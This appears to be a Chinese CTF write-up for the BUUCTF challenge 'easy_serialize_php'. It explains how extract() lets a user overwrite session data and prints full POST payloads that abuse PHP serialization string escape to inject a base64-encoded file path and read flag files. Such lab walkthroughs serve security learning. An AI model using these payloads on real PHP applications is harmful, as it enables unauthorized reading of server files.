BUUCTF [安洵杯 2019]easy_serialize_php 1

打开题目，看到一串php代码，试着代码审计一下，看一下有用信息

可以看出是通过$_SESSION['img']来读取文件

extract可以将数组中的变量导入当前变量表

也就是说我们可以伪造$_SESSION 数组中的所有数据

这里传递一个参数f=phpinfo

先用hackbar进行post传参试试

然后直接抓包

POST /index.php HTTP/1.1
Host: 8fc7bd3e-f31b-4ff2-87e7-a4722b83e2ed.node5.buuoj.cn:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 142
Origin: http://8fc7bd3e-f31b-4ff2-87e7-a4722b83e2ed.node5.buuoj.cn:81
Connection: close
Referer: http://8fc7bd3e-f31b-4ff2-87e7-a4722b83e2ed.node5.buuoj.cn:81/index.php?f=highlight_file
Upgrade-Insecure-Requests: 1

_SESSION[user]=flagflagflagflagflagphp&_SESSION[function]=";s:8:"function";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}&function=show_image

post传参

_SESSION[user]=flagflagflagflagflagphp&_SESSION[function]=";s:8:"function";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}&function=show_image，逃逸

对d0g3_f1ag.php进行base64编码得到ZDBnM19mMWFnLnBocA==，填入burp

读取

替换编码_SESSION[user]=flagflagflagflagflagphp&_SESSION[function]=";s:8:"function";s:1:"1";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}&function=show_image得到flag